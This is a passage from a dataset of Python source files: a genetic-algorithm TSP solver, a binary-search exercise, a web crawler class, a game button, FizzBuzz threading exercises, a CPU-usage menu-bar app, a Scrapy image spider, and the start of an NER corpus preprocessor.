price_changes=price_changes)\n","sub_path":"rjgoptionssite/oldflasky/flasky-16NOV/controllers/summary_analysis_controller.py","file_name":"summary_analysis_controller.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"68941584","text":"import sys\nimport time\nimport math\nimport random\n#transition 任兩個互換\n#evalutation 連線距離和 \n#determination 距離短者獲勝\n#note:\n#random.randint(a,b) --> a <= x <= b\n#range(a,b) --> a <= x < b\n#senario: fitness(), select(), crossover(), mutation()\n#Data structure: chromo_data = {'chromo':[],'distance':[]}\n\ndef ran(domain):\n first = 0\n second = 0\n while first == second:\n first = random.randint(0,domain-1)\n second = random.randint(0,domain-1)\n \n return [first,second]\n\ndef init(num,chromo_num):\n chromo_data = {'chromo':[],'distance':[]}\n \n for i in range(chromo_num):\n seq = []\n list_1_to_num = list(range(1,num+1))\n while len(list_1_to_num) > 0:\n index = random.randint(0,len(list_1_to_num)-1)\n seq.append(list_1_to_num.pop(index))\n chromo_data['chromo'].append(seq)\n return chromo_data\n\ndef trans(seq):\n temp = seq[:] \n index = ran(len(seq)) \n t = temp[index[0]]\n temp[index[0]] = temp[index[1]]\n temp[index[1]] = t\n return temp\n\ndef distance(axis):\n return round(math.sqrt(axis[0]*axis[0]+axis[1]*axis[1]))\n\ndef evalu(seq,dic):\n dist = 0\n for i in range(len(seq)):\n delta_x = dic[seq[i]][0]-dic[seq[(i+1)%len(seq)]][0]\n delta_y = dic[seq[i]][1]-dic[seq[(i+1)%len(seq)]][1]\n \n dist += distance([delta_x,delta_y])\n \n return dist\n\ndef determin(temp,seq,dic):\n if evalu(temp,dic) < evalu(seq,dic):\n seq = temp[:]\n return seq \n \ndef readfile(dic):\n with open('eil51.txt') as f:\n r = f.read()\n read_line = r.split('\\n') \n for i in range(len(read_line)): \n read_element = read_line[i].split() \n dic[int(read_element[0])] = [int(read_element[1])]\n dic[int(read_element[0])].append(int(read_element[2]))\n f.close()\n\ndef fitness(chromo_data,dic):\n #clear chromosome distance\n new_data = {'chromo':[],'distance':[]}\n new_data['chromo'] = chromo_data['chromo'][:]\n \n #calculate distance of each chromosome\n for i in range(len(chromo_data['chromo'])):\n new_data['distance'].append(evalu(chromo_data['chromo'][i],dic))\n return new_data\ndef select(chromo_data,player):\n new_data = {'chromo':[],'distance':[]}\n while len(new_data['chromo']) < len(chromo_data['chromo']):\n tmp = []\n check = []\n ran_list = []\n while len(tmp) < player:\n ran = random.randint(0,len(chromo_data['chromo'])-1)\n if ran not in ran_list:\n check = chromo_data['chromo'][ran]\n tmp.append(check)\n \n \n best = tmp[0]\n for i in tmp:\n if evalu(i,dic) < evalu(best,dic):\n best = i\n new_data['chromo'].append(best)\n \n \n return new_data\n\ndef crossover(chromo_data,c_rate):\n new_chromo = {'chromo':[],'distance':[]}\n while 1:\n test1 = chromo_data['chromo'].pop(random.randint(0,len(chromo_data['chromo'])-1))\n test2 = chromo_data['chromo'].pop(random.randint(0,len(chromo_data['chromo'])-1))\n if random.random() > c_rate:\n new_chromo['chromo'].append(test1)\n new_chromo['chromo'].append(test2)\n else:\n #print('chosen list:',test1,test2)\n index1 = random.randint(0,len(test1)-1)\n index2 = random.randint(0,len(test2)-1)\n new2 = test1[index1:index2+1]\n new1 = test2[index1:index2+1]\n tmp1 = [x for x in test1 if x not in new2]\n tmp2 = [x for x in test2 if x not in new1]\n index1 = min(index1,index2)\n index2 = max(index1,index2)\n #print('break:',index1,index2)\n #find order of chromo\n for i in range(len(tmp1)):\n alter = tmp1[i]\n while 1:\n if alter in new1:\n alter = new2[new1.index(alter)]\n else:\n tmp1[i] = alter\n break\n for i in range(len(tmp2)):\n alter = tmp2[i]\n while 1:\n if alter in new2:\n alter = new1[new2.index(alter)]\n else:\n tmp2[i] = alter\n break \n \n \n\n #paste back lookup to test\n new1 = tmp1[0:index1]+new1+tmp1[index1:]\n new2 = tmp2[0:index1]+new2+tmp2[index1:]\n new_chromo['chromo'].append(new1)\n new_chromo['chromo'].append(new2)\n if len(chromo_data['chromo']) < 2:\n if len(chromo_data['chromo']) == 1:\n new_chromo['chromo'].append(chromo_data['chromo'].pop()) \n break\n return new_chromo\n\ndef mutation(chromo_data,m_rate):\n new_data = {'chromo':[],'distance':[]}\n new_data['chromo'] = chromo_data['chromo'][:]\n \n \n if random.random() < m_rate:\n index = random.randint(0,len(new_data['chromo'])-1)\n tmp = trans(new_data['chromo'].pop(index))\n new_data['chromo'].append(tmp)\n \n return new_data\ndef get_average(list):\n sum = 0\n for item in list:\n sum += item\n return sum/len(list)\ndef get_stddev(list):\n average = get_average(list)\n sdsq = sum([(i - average) ** 2 for i in list])\n stdev = (sdsq / (len(list) - 1)) ** .5\n return stdev \n\n#initial \n\n\n #dic={a:b}, a是點的編號(type[int]),b是點的座標(type[list]) (Ex:dic={1:[0,1]})\ndic = {}\nreadfile(dic)\nchromo_num = 100\niter_num = input('Please enter the iteration:')\niter_num = int(iter_num)\nplayer = 25\n\n\nt1 = time.time()\n#Execute\n\nchromo_data = init(len(dic),chromo_num)\nchromo_data = fitness(chromo_data,dic)\nfor i in range(1,iter_num+1): \n #print('iter',i)\n chromo_data = select(chromo_data,player)\n chromo_data = fitness(chromo_data,dic)\n #print('after select:',chromo_data['distance'])\n chromo_data = crossover(chromo_data,0.9)\n chromo_data = fitness(chromo_data,dic)\n #print('after crosso:',chromo_data['distance'])\n chromo_data = mutation(chromo_data,0.9)\n chromo_data = fitness(chromo_data,dic)\n #print('after mutati:',chromo_data['distance'])\n #print(get_stddev(chromo_data['distance']))\n #print(chromo_data['distance'])\n #result[i] += evalu(seq,dic)\n #print(' ')\n \n \n \nt2 = time.time() \nprint('Time: %.2f (second)(不包含I/O時間)'% (t2-t1))\nprint(chromo_data['distance']) \n\n\n#Calculating average and output\n\n\n\n\n\n","sub_path":"ga_tsp_problem/ga_tour_pmx_tsp.py","file_name":"ga_tour_pmx_tsp.py","file_ext":"py","file_size_in_byte":6619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"100692861","text":"# COURSERA\n\ndef busca_binaria(lista,x):\n primeiro = 0\n ultimo = len(lista)-1\n\n while primeiro <= ultimo:\n meio = (primeiro+ultimo)//2\n if lista[meio] == x:\n return meio\n else:\n if x < lista[meio]:\n ultimo = meio-1\n else:\n if x > lista[meio]:\n primeiro = meio+1\n return \"elemento nao encontrado\"\n\ndef add_lista(lista,valores):\n lista.append(valores)\n return lista\n\nlista = []\ntamanho = int(input(\"Digite o tamanho da lista: \"))\n\nwhile len(lista) < tamanho: # add os valores de acordo com o tamanho especificado\n valores = int(input(\"digite os valores a serem add na lista: \"))\n add_lista(lista,valores)\n\nprint(lista)\n\nx = int(input(\"Dgt o valor para buscar na lista: \"))\n\nprint(busca_binaria(lista,x))\n\n","sub_path":"Aulas/Algoritmo de Busca/Busca_binaria.py","file_name":"Busca_binaria.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"325031741","text":"from concurrent.futures import ThreadPoolExecutor\n\nfrom requests import Session\nfrom tqdm import tqdm\n\nfrom .cache import Cache\n\nREQUEST_HEADERS = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7\",\n \"Cache-Control\": \"no-cache\",\n \"Connection\": \"keep-alive\",\n \"DNT\": \"1\",\n \"Pragma\": \"no-cache\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\"\n}\n\n\nclass BaseCrawler:\n def __init__(self):\n self.debug = False\n\n self.session = Session()\n self.cache = None\n\n def collect(self):\n raise NotImplementedError\n\n def make_get_req(self, url, **kwargs):\n if self.debug:\n if not self.cache:\n self.cache = Cache()\n\n response = self.cache.get(url)\n\n if response:\n return response\n\n response = self.make_get(url, **kwargs)\n\n if response.status_code == 200:\n self.cache.put(url, response)\n\n return response\n\n return self.make_get(url, **kwargs)\n\n def make_get(self, url, **kwargs):\n default_kwargs = dict(\n headers=REQUEST_HEADERS,\n timeout=60,\n allow_redirects=True\n )\n\n return self.session.request(\n method='GET',\n url=url,\n **{**default_kwargs, **kwargs}\n )\n\n def make_get_async(self, url_list, name=None, **kwargs):\n output = []\n\n with ThreadPoolExecutor(max_workers=8) as executor:\n future_to_obj = {executor.submit(self.make_get_req, url, **kwargs): url for url in url_list}\n\n iterator = tqdm(future_to_obj, desc=name) if self.debug is True else future_to_obj\n\n for future in iterator:\n try:\n response = future.result()\n except:\n break\n\n output.append(response)\n\n return output\n","sub_path":"apollo/backend/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"443239083","text":"# coding: cp949\nfrom pico2d import *\n\nimport Manager_Sound\n\nclass Button:\n def __init__(self, _x, _y, _type):\n self.buttonType = _type\n self.X ,self.Y = _x, _y\n self.mouseX, self.mouseY = 0, 0\n self.events = None;\n #충돌인지 아닌지 체크하는 부분과 이미지\n self.frame = 0\n self.isFirst = False\n\n def __del__(self):\n self.exit()\n\n def enter(self):\n #버튼의 종류를 인식(1.시작버튼 2.맵선택1 3.맵선택2 4.나가기 5~8.로비아이템수증가)\n if self.buttonType == 1:\n self.sizeX, self.sizeY = 192, 55\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Lobby_Button_Start.png')\n elif self.buttonType == 2:\n self.sizeX, self.sizeY = 135, 21\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Loddy_Image_SelectMap_0.png')\n elif self.buttonType == 3:\n self.sizeX, self.sizeY = 135, 21\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Loddy_Image_SelectMap_1.png')\n elif self.buttonType == 4:\n self.sizeX, self.sizeY = 140, 32\n self.buttonImage = load_image('.\\\\Sprite\\\\03.InGame\\\\InGame_Button_Out.png')\n elif self.buttonType == 5:\n self.sizeX, self.sizeY = 33, 26\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Lobby_QButton.bmp')\n elif self.buttonType == 6:\n self.sizeX, self.sizeY = 33, 26\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Lobby_WButton.bmp')\n elif self.buttonType == 7:\n self.sizeX, self.sizeY = 33, 26\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Lobby_EButton.bmp')\n elif self.buttonType == 8:\n self.sizeX, self.sizeY = 33, 26\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Lobby_RButton.bmp')\n\n def exit(self):\n del (self.buttonImage)\n\n def update(self, _events):\n if (((self.X - self.sizeX / 2) < self.mouseX) and ((self.X + self.sizeX / 2) > self.mouseX)) \\\n and (((self.Y - self.sizeY / 2) < (600 - self.mouseY)) and ((self.Y + self.sizeY / 2) > (600 - self.mouseY))):\n self.frame = 1\n if self.isFirst == False:\n self.isFirst = True\n Manager_Sound.PlayEffectSound('BUTTON_ON')\n else:\n self.frame = 0\n if self.isFirst == True:\n self.isFirst = False\n Manager_Sound.PlayEffectSound('BUTTON_OFF')\n\n # 키의 종류에 따라서 달라지는 리턴값들\n if(self.keycheck(_events)):\n return self.buttonType\n\n def draw(self):\n #프레임이 시작하는 그림에서의 X좌표, Y좌표(Y좌표는 아래서부터 1) => 왼쪽 아래부터 오른쪽 위까지 하나를 그림\n if (self.buttonType == 1) or (self.buttonType == 4):\n self.buttonImage.clip_draw((self.frame * self.sizeX), 0,\n self.sizeX, self.sizeY,\n self.X, self.Y)\n elif (self.buttonType == 2) or (self.buttonType == 3):\n self.buttonImage.clip_draw(((self.frame - 1) * self.sizeX), 0,\n self.sizeX, self.sizeY,\n self.X, self.Y)\n elif (self.buttonType >= 5) and (self.buttonType <= 8):\n self.buttonImage.clip_draw(0, 0,\n self.sizeX, self.sizeY,\n self.X, self.Y)\n\n def keycheck(self, _events):\n # 마우스값을 받음\n self.events = _events\n\n for event in self.events:\n if event.type == SDL_MOUSEMOTION:\n self.mouseX, self.mouseY = event.x, event.y\n if (event.type, self.frame) == (SDL_MOUSEBUTTONUP, 1):\n Manager_Sound.PlayEffectSound('EMPTY_ON')\n return True","sub_path":"CrazyArcade_Packaging/Object_Button.py","file_name":"Object_Button.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"67852552","text":"'''\n编写一个可以从 1 到 n 输出代表这个数字的字符串的程序,但是:\n\n如果这个数字可以被 3 整除,输出 \"fizz\"。\n如果这个数字可以被 5 整除,输出 \"buzz\"。\n如果这个数字可以同时被 3 和 5 整除,输出 \"fizzbuzz\"。\n例如,当 n = 15,输出: 1, 2, fizz, 4, buzz, fizz, 7, 8, fizz, buzz, 11, fizz, 13, 14, fizzbuzz。\n\n假设有这么一个类:\n\nclass FizzBuzz {\n  public FizzBuzz(int n) { ... }  // constructor\n public void fizz(printFizz) { ... } // only output \"fizz\"\n public void buzz(printBuzz) { ... } // only output \"buzz\"\n public void fizzbuzz(printFizzBuzz) { ... } // only output \"fizzbuzz\"\n public void number(printNumber) { ... } // only output the numbers\n}\n请你实现一个有四个线程的多线程版  FizzBuzz, 同一个 FizzBuzz 实例会被如下四个线程使用:\n\n线程A将调用 fizz() 来判断是否能被 3 整除,如果可以,则输出 fizz。\n线程B将调用 buzz() 来判断是否能被 5 整除,如果可以,则输出 buzz。\n线程C将调用 fizzbuzz() 来判断是否同时能被 3 和 5 整除,如果可以,则输出 fizzbuzz。\n线程D将调用 number() 来实现输出既不能被 3 整除也不能被 5 整除的数字。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/fizz-buzz-multithreaded\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\nfrom threading import Thread, Condition\n\n''' Condition解法\n'''\ndef fizz():\n while True:\n if con1.acquire():\n con1.wait()\n print('fizz')\n con1.notify()\n\ndef buzz():\n while True:\n if con2.acquire():\n con2.wait()\n print('buzz')\n con2.notify()\n\ndef fizzbuzz():\n while True:\n if con3.acquire():\n con3.wait()\n print('fizzbuzz')\n con3.notify()\n\ndef number():\n while True:\n if con4.acquire():\n con4.wait()\n print(n)\n con4.notify()\n\ncon1 = Condition()\ncon2 = Condition()\ncon3 = Condition()\ncon4 = Condition()\nn=0\n\nif __name__ == '__main__':\n t1 = Thread(target=fizz)\n t2 = Thread(target=buzz)\n t3 = Thread(target=fizzbuzz)\n t4 = Thread(target=number)\n t1.start()\n t2.start()\n t3.start()\n t4.start()\n with con1,con2,con3,con4:\n for i in range(1,16):\n n=i\n if i%3==0 and i%5==0:\n con3.notify()\n con3.wait()\n elif i%3==0:\n con1.notify()\n con1.wait()\n elif i%5==0:\n con2.notify()\n con2.wait()\n else:\n con4.notify()\n con4.wait()\n\n''' Semaphore解法\ndef fizz():\n while True:\n if con1.acquire():\n print('fizz')\n con.release()\n\ndef buzz():\n while True:\n if con2.acquire():\n print('buzz')\n con.release()\n\ndef fizzbuzz():\n while True:\n if con3.acquire():\n print('fizzbuzz')\n con.release()\n\ndef number():\n while True:\n if con4.acquire():\n print(n)\n con.release()\n\ncon1 = Semaphore(0)\ncon2 = Semaphore(0)\ncon3 = Semaphore(0)\ncon4 = Semaphore(0)\ncon = Semaphore(1)\nn=0\n\nif __name__ == '__main__':\n\n t1 = Thread(target=fizz)\n t2 = Thread(target=buzz)\n t3 = Thread(target=fizzbuzz)\n t4 = Thread(target=number)\n t1.start()\n t2.start()\n t3.start()\n t4.start()\n\n for i in range(1,16):\n con.acquire()\n n=i\n if i%3==0 and i%5==0:\n con3.release()\n elif i%3==0:\n con1.release()\n elif i%5==0:\n con2.release()\n else:\n con4.release()\n'''\n\n''' Queue解法\ndef fizz():\n while True:\n if q1.get():\n print('fizz')\n q.put(1)\n\ndef buzz():\n while True:\n if q2.get():\n print('buzz')\n q.put(1)\n\ndef fizzbuzz():\n while True:\n if q3.get():\n print('fizzbuzz')\n q.put(1)\n\ndef number():\n while True:\n if q4.get():\n print(n)\n q.put(1)\n\nq1 = Queue()\nq2 = Queue()\nq3 = Queue()\nq4 = Queue()\nq = Queue()\nn=0\n\nif __name__ == '__main__':\n\n t1 = Thread(target=fizz)\n t2 = Thread(target=buzz)\n t3 = Thread(target=fizzbuzz)\n t4 = Thread(target=number)\n t1.start()\n t2.start()\n t3.start()\n t4.start()\n q.put(1)\n\n for i in range(1,16):\n q.get()\n n=i\n if i%3==0 and i%5==0:\n q3.put(1)\n elif i%3==0:\n q1.put(1)\n elif i%5==0:\n q2.put(1)\n else:\n q4.put(1)\n'''","sub_path":"多线程/交替打印字符串.py","file_name":"交替打印字符串.py","file_ext":"py","file_size_in_byte":4780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"99556378","text":"# ちーともわからんので解説見た\n# ら、悔しさあふれる感じ\n# NGになる文字の並びは限定される。3文字のものは\"ACG\" \"GAC\", 4文字のものは\"AxGC\", \"AGxC\"\n# ここで, \"AAGC\"とか\"AGCC\"なんてのを考え出すと「すでに\"AGC\"が含まれとるやんけ」->(だから何?)みたいなよくわからん思考に陥ってしまった\n# (いまみてるのとそれ以前の3つを保存して探索すると結局かぶらず全探索できるので考えなくていい)\n\n# n = input()\n\n# なんで???????????\n# これが無限ループになるの????????????????\n# は???????????????????????????\n# def f(i, s):\n# if i == n:\n# return 1\n# # print(\"now s : {}\".format(s))\n# ret = 0\n# for c in \"ACGT\":\n# print(s + c)\n# is_include = True if \"AGC\" in s + c else False\n# if is_include:\n# continue\n# ret += f(i + 1, s[1:] + c)\n# return ret\n# print(f(0, \"xxx\"))\n# coding: utf-8\n# Your code here!\n\nn = int(input())\nmemo = {}\n\n\ndef f(i, s):\n if (i, s) in memo:\n return memo[(i, s)]\n if i == n:\n return 1\n ret = 0\n for c in \"AGCT\":\n flag = False\n for j in range(4):\n t = list(s + c)\n if j >= 1:\n t[j], t[j - 1] = t[j - 1], t[j]\n if \"AGC\" in \"\".join(t):\n flag = True\n if not flag:\n ret += f(i + 1, s[1:] + c)\n ret %= 10 ** 9 + 7\n memo[(i, s)] = ret\n return ret\n\n\nprint(f(0, \"TTT\"))\n","sub_path":"Python_codes/p03088/s920695048.py","file_name":"s920695048.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"216336898","text":"#-*- coding:utf-8 -*-\nimport rumps\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport psutil #cpu��用率の取得用\nimport tempfile\nimport shutil\nimport os\n\nclass CpuUsageApp(rumps.App):\n\n def __init__(self):\n super(CpuUsageApp, self).__init__(\"CPU Usage App\")\n rumps.debug_mode(False)\n self.menu = ['Show text']\n self.enable_text = True\n\n #CPU使用率グラフ作成\n self.time = np.arange(10)\n self.usage = np.zeros_like(self.time)\n self.fig = plt.figure(figsize=(1, 1), dpi=100)\n self.ax = self.fig.add_subplot(111)\n self.ax.set_xlim(0, 9)\n self.ax.set_ylim(0, 100)\n self.line, = self.ax.plot(self.time, self.usage, lw=3)\n self.canvas = self.fig.canvas\n self.axes = self.line.axes\n plt.axis('off')\n\n #iconは一時保存ディレクトリに入れてアプリ終了後に消す\n self.tmp_dir = tempfile.mkdtemp()\n self.img_path = os.path.join(self.tmp_dir, 'cpu_usage.png')\n plt.savefig(self.img_path, transparent=True, dpi=100)\n\n #iconをセット\n self.icon = self.img_path\n\n def __del__(self):\n shutil.rmtree(self.tmp_dir)\n\n #テキスト表示の有無\n @rumps.clicked(\"Show text\")\n def show_text(self, sender):\n self.enable_text = not self.enable_text\n sender.state = self.enable_text\n if not self.enable_text:\n self.title = None\n\n #1秒毎に更新\n @rumps.timer(1)\n def update(self, _):\n #CPU使用率取得\n usage = psutil.cpu_percent()\n self.usage = np.roll(self.usage, 1)\n self.usage[0] = usage\n #左へ遷移するよう配列を反転\n self.line.set_ydata(self.usage[::-1])\n #線を更新\n self.axes.draw_artist(self.line)\n self.canvas.blit(self.axes.bbox)\n #iconファイル出力\n plt.savefig(self.img_path, transparent=True, dpi=100)\n self.icon = self.img_path\n\n #テキスト表示\n if self.enable_text:\n self.title = ' '+str(self.usage[0])+' %' if self.usage[0]<10 else str(self.usage[0])+' %'\n\nif __name__ == \"__main__\":\n app = CpuUsageApp()\n app.run()\n","sub_path":"osx/Applications/CpuUsageApp/CpuUsageApp.py","file_name":"CpuUsageApp.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"601652984","text":"import scrapy\nfrom getteamimages.items import GetteamimagesItem\n\nclass AllteamimgSpider(scrapy.Spider):\n name = \"allteamimg\"\n allowd_domains = [\"dribbble.com\"]\n start_urls = [\"https://dribbble.com/teams\"]\n dn = \"https://dribbble.com\"\n\n def parse(self, response):\n links = response.css('a[class=url]::attr(href)').extract()\n for link in links:\n url = self.dn + link\n yield scrapy.Request(url, callback=self.etparse)\n\n nextpgs = response.css('a[class=next_page]::attr(href)').extract()\n for nextpg in nextpgs:\n nextpgurl = 'https://dribbble.com'+nextpg\n yield scrapy.Request(nextpgurl , callback=self.parse) \n\n\n\n def etparse(self, response):\n srcs = response.css('div[class=dribbble-img]').css('img::attr(src)').extract()\n \n for src in srcs:\n if src[(len(src)-4):] == '.png':\n item = GetteamimagesItem()\n item['imagelink'] = src[:(len(src)-len('_teaser.png'))]+'.png' \n item['imageid'] = src.split('/')[6]\n yield item\n\n links = response.css('a[class=next_page]::attr(href)').extract()\n for link in links:\n newurl = 'https://dribbble.com'+link\n yield scrapy.Request(newurl , callback=self.etparse) \n\n\n\n\n \n\n","sub_path":"python/imagecrawler/getteamimages/getteamimages/spiders/allteamimg.py","file_name":"allteamimg.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"281032161","text":"#This script is designed to be python 2.7 and 3.3 compatible\n\nimport sys, os, time\n\nprint(\"Hello from Python!\")\nsys.stdout.flush()\n\nvalue = 0\nwhile (1):\n#\n\ttime.sleep(1)\n\tprint(\"Value = %u\" % value)\n\tvalue += 1\n\tsys.stdout.flush()\n\t\n\tif (value >= 4): break\n#","sub_path":"data/ConstPort.app/Contents/MacOS/Resources/Scripts/testScript.py","file_name":"testScript.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"56240833","text":"\"\"\"\nWrite a definition for twenty_three_and_me such that it prints the family\n\t- Accomplish this using the outputGeneratio method and recursion\n\"\"\"\n\nimport random\n\nclass AlphaParent(object):\n\n\tdef __init__(self, eye_color, hair_color):\n\t\tself.eyes = eye_color\n\t\tself.hair = hair_color\n\tdef __add__(self, mate):\n\t\treturn Child(self,mate)\n\t\n\tdef __str__(self):\n\t\treturn \"{} hair - {} eyes\".format(self.hair, self.eyes)\n\nclass Child(AlphaParent):\n\n\tdef __init__(self, mom, dad):\n\t\tself.mom = mom\n\t\tself.dad = dad\n\t\tself.eyes = random.choice([mom.eyes, dad.eyes])\n\t\tself.hair = random.choice([mom.hair, dad.hair])\n\t\n\tdef twenty_three_and_me(self, great = -1):\n\n\t\tif not (isinstance(self.mom,Child) and isinstance(self.dad, Child)):\n\t\t\tself.outputGeneration(self.mom, self.dad, great)\n\n\t\telse:\n\t\t\tself.dad.twenty_three_and_me(great + 1)\n\t\t\tself.mom.twenty_three_and_me(great + 1)\n\t\t\tself.outputGeneration(self.mom, self.dad, great)\n\n\tdef outputGeneration(self, mom, dad, great):\n\t\n\t\tif(great > 0):\n\t\t\tprint(\"Great\" * great, \"GrandFather:\", dad)\n\t\t\tprint(\"Great\" * great, \"GrandMother:\", mom)\n\t\tif great == 0:\n\t\t\tprint(\"GrandFather:\", dad)\n\t\t\tprint(\"GrandMother:\", mom)\n\t\tif great == -1:\n\t\t\tprint(\"Father:\", dad)\n\t\t\tprint(\"Mother:\", mom)\n\nif __name__ == \"__main__\":\n \n a1 = AlphaParent(\"Blue\", \"Blonde\")\n a2 = AlphaParent(\"Brown\", \"Burnette\")\n a3 = AlphaParent(\"Blue\", \"Red\")\n a4 = AlphaParent(\"Blue\", \"Burnette\")\n\n b1 = a1 + a2\n b2 = a3 + a4\n\n c1 = b1 + b2\n\n\n c1.twenty_three_and_me()\n print()\n print(c1)","sub_path":"Recursion/breeding_class_w_recursion.py","file_name":"breeding_class_w_recursion.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"238550210","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy import integrate\n\nl = 1\n\n\n\nd = 0\n\n\n\ndef I(o):\n\n def I(q):\n g = o - d + q**2/2\n\n cc = (1+2*g)/(2*q)\n dd = np.sqrt( np.abs(2*g) )/q\n\n def a(x):\n r1 = q*x + np.sqrt( np.abs(q**2*x**2-2*g) )\n r2 = q*x - np.sqrt( np.abs(q**2*x**2-2*g) )\n a = 1/(r1 -r2) * \\\n (\\\n np.heaviside(-g,0) * np.heaviside(cc-x,0) * r1**2 \\\n +np.heaviside( g,0) * np.heaviside(x-dd,0) * np.heaviside(x,0)\\\n *( np.heaviside(cc-x,0)*r1**2 + r2**2 )\\\n )\n return a\n A, err = integrate.quad(a, -1, 1)\n A = np.pi*A\n\n def b(x):\n r1 = q*x + np.sqrt( np.abs(q**2*x**2-2*g) )\n r2 = q*x - np.sqrt( np.abs(q**2*x**2-2*g) )\n\n cc = (1+2*g)/(2*q)\n dd = np.sqrt( np.abs(2*g) )/q\n\n\n noroot = np.heaviside(g,0)*np.heaviside(dd-x,0) # no root heaviside\n root = np.heaviside(-g,0) + \\\n np.heaviside(g,0)*np.heaviside(x-dd,0) # root heaviside\n\n bnoroot11 = np.arctan( (1-q*x)/np.sqrt(np.abs(2*g-q**2*x**2 ) ) )\n bnoroot12 = np.arctan( ( -q*x)/np.sqrt(np.abs(2*g-q**2*x**2 ) ) )\n bnoroot1 = (-4*g)/ (2*g - q**2*x**2)*(bnoroot11 - bnoroot12)\n bnoroot2 = 2*q*x*np.log( np.abs( (.5-q*x+g)/g ) )\n bnoroot = bnoroot1 + bnoroot2\n\n broot1 = -2*g/(r1-r2) * np.log( np.abs((r2*(1-r1))/(r1*(1-r2))) )\n broot2 = 2*q*x/(r1-r2) * \\\n (r1*np.log( np.abs(1/r1-1) ) - r2*np.log( np.abs(1/r2-1) ) )\n broot = broot1 + broot2\n\n b = 2 + noroot*bnoroot +root*broot\n return b\n B, err = integrate.quad(b, -1, 1)\n\n I = l**2*A * ( (o-l**2*B)**2 + l**4*A**2 ) *q**2\n return I\n I, err = integrate.quad(I, 0, 1)\n return I\n\nN = 3\no = np.linspace(-2, 2, N)\nII = np.linspace(0, 0, N)\nfor i in range (N):\n II[i] = I(o[i])\n print(i)\n\nprint(II)\n","sub_path":"source/posts/2019-02-21-physics-RF谱PRA文献重复/flycheck_t0anyl2-NSConflict-王泽庆-linux4.20.15-1-MANJARO.py","file_name":"flycheck_t0anyl2-NSConflict-王泽庆-linux4.20.15-1-MANJARO.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"262570682","text":"# -*-coding:utf-8-*-\nimport os\nimport re\nimport pickle\nimport numpy as np\nimport pandas as pd\n\n\nclass Data:\n def __init__(self, args):\n self.corpus_path = args.corpus_path\n self.train_path = args.train_path\n self.test_path = args.test_path\n self.vocab_path = args.vocab_path\n self.embedding_dim = args.hidden_dim\n\n\n # 语料库预处理\n def tag_line(self, words):\n # 对应字数组\n chars = []\n # 字数组对应标签\n tags = []\n temp_word = '' # 用于合并组合词([]中的组合词)\n # print(\"+==============+++++++++++++++++++++++++++++++++++++=\")\n for word in words:\n # print(word)\n if word == \"/w\": continue # 去除因分句剩下的标点的标注\n word = word.strip('\\t ') # 如:迈向/v\n if temp_word == '':\n bracket_pos = word.find('[') # [ ]ns\n w = word.split('/')[0] # w:词;h:词性\n if bracket_pos == -1: # 没有'['\n if len(w) == 0: continue\n chars.extend(w) # 加入数组\n # if h == 'ns': # 词性为地名\n # 单字词:+S;非单字词:+B(实体首部)、M*(len(w)-2)(实体中部)、E(实体尾部)\n tags += ['S'] if len(w) == 1 else ['B'] + ['M'] * (len(w) - 2) + ['E']\n else: # 有'['\n # 获取'['后的词\n w = w[bracket_pos + 1:]\n temp_word += w\n else:\n bracket_pos = word.find(']')\n w = word.split('/')[0]\n if bracket_pos == -1:\n temp_word += w\n else:\n w = temp_word + w\n h = word[bracket_pos + 1:]\n temp_word = ''\n if len(w) == 0: continue\n chars.extend(w)\n # if h == 'ns':\n tags += ['S'] if len(w) == 1 else ['B'] + ['M'] * (len(w) - 2) + ['E']\n\n assert temp_word == ''\n return (chars, tags)\n\n # 中文分句\n def cut_sentence(self, sentence):\n sentence_list = re.split(\"。|!|\\!|?|\\?\", sentence)\n return sentence_list\n\n # 加载语料库\n def load_corpus(self):\n data = []\n train_data = []\n test_data = []\n pos = 0\n with open(self.corpus_path, encoding='utf-8') as 